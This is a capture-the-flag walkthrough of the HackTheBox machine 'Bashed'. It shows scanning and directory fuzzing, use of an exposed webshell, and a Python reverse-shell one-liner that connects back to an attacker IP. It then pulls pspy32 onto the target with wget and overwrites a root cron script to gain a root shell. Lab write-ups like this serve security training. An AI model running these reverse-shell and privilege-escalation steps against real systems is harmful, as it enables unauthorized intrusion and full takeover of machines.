Bashed is a retired linux box on HackTheBox. It is mentioned in the Tj_Null’s list of OSCP like boxes. Let us begin with scanning.

SCANNING :

nmap <IP>

Let us do a service scan for software version detection with -sV switch of nmap.

nmap -sV <IP>

It reveals port 80 has Apache httpd 2.4.18 running.

Enumeration :

If I hit the IP on the browser, the below image shows up :

It says there is a webshell (phpbash) installed somewhere on the server. Let us do some fuzzing now to see if we get the webshell directory.

wfuzz -c -u http://<IP>/FUZZ -w /usr/share/wordlist/dirb/big.txt — hc 400,403,404

-c : for colored output.

-u : for specifying IP.

-w : for specifying wordlist.

— hc : for hiding pages with response code follows.

The wfuzz scan reveals some directories. The dev directory looks interesting. Let us have a look at it.

The dev directory contains the webshell.

EXPLOITATION :

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<IP>”,<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’

Type the above on the webshell prompt, hit enter and set up a netcat listener on provided port.

nc -nlvp <port>

We have shell now. You can read the user flag.

PRIVILEGE ESCALATION TO SCRIPTMANAGER :

If that is the case, I can simply run bash with sudo as user scriptmanager.

sudo -u scriptmanager bash

We got shell as scriptmanager.

PRIVILEGE ESCALATION TO ROOT :

find / -type f -user scriptmanager 2>/dev/null

If my instinct is right, there may be a cron job for root running the python script. To verify it, I am going to use pspy32 that is used to see commands run by other users, cron jobs, etc. as they execute. You can find the binary here.

Set up a local python server on the directory of local box where pspy32 is present.

python3 -m http.server 80

On the remote box, download it with wget.

wget http://<your IP>/pspy32

Hopefully pspy32 is now present on the remote box.

Let us run it now.

./pspy32

Seems I was right. The test.py is running as cronjob for root in every 1 minute interval.

We can use the same python reverse shell that we used for www-shell, but with a different port number. Save the reverse shell code to /scripts/test.py and set up another netcat listener on different tab.

We have the root shell now. You can read the root flag.

So that was the bashed box from HackTheBox. Hope you enjoyed it.

Thank You for reading this writeup. See you in the next one. Peace.

Breaking things like a bàKà